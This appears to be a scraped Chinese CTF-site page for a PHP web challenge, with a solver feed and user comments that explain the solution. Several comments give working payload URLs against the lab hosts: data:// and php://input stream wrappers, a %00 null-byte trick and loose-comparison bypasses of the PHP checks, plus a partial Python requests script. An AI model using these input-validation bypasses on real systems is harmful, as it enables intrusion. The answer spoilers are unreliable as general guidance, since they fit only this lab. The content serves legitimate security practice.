评分(25)
解题动态
207439410 攻破了该题 2小时前
desireart 攻破了该题 1天前
kukuqi666 攻破了该题 2天前
2021060287 攻破了该题 2天前
17630080330 攻破了该题 2天前
暗A166668 攻破了该题 2天前
alizee 攻破了该题 2天前
椰子 攻破了该题 2天前
huangyujie 攻破了该题 3天前
派大星CTF 攻破了该题 3天前
姥姥 攻破了该题 4天前
wengun 攻破了该题 4天前
qianye 攻破了该题 4天前
凌晨3点的阳光 攻破了该题 4天前
LLLhhh 攻破了该题 5天前
xiaona1111 攻破了该题 5天前
zhuyh69 攻破了该题 5天前
dongxin 攻破了该题 5天前
ren186 攻破了该题 6天前
评论
冯飞99 2年前
举报
总结一下吧,查到源码后得到url 解码后得到base64,解码后得到url,解码后出现php源代码,查看源代码检查好规则,构建payload,bp抓包,发送给重发器,查看结果。
2089669143 2年前
举报
为什么我登陆到1p.html以后它直接跳转到https://www.bugku.com/,求救救我
MiracleWolf 2年前
举报
在跳转网页时进行bp抓包,在返回包中能看到网站后面藏了东西,然后解码。
莴笋要种泥里 2年前
举报
我也是,什么原因
evens 2年前
举报
?id=0a&b=*111111&a=data://text/plain;base64,YnVna3UgaXMgYSBuaWNlIHBsYXRlZm9ybSE=
wxy1343 2年前
举报
http://114.67.175.224:14407/hello.php?id=a&a=data:,bugku is a nice plateform!&b=%0011111
xclay 2年前
举报
伙伴们输入参数的时候一定不要带任何引号,不然不好使
Restwlaq 2年前
举报
第一步直接view-source:url/1p.html。第二步,如果用Bp就可以发现靶机php版本响应是5.5,一篇文章说php://input在5.3以后就不用了。所以小伙伴们不要纠结php://input了,使用data://协议吧
joyoung 2年前
举报
?id=0a&a=data://text/plain,bugku is a nice plateform!&b=?12345
zdfy005 2年前
举报
import requests url='http://114.67.246.176:14183/?id=0dut2251&a=php://input&b=*000000' head={'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0'} data='b
zdfy005 2年前
举报
$data = @file_get_contents($a,'r'); if($data=="bugku is a nice plateform!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)
笨笨笨蛋 3年前
举报
真的没懂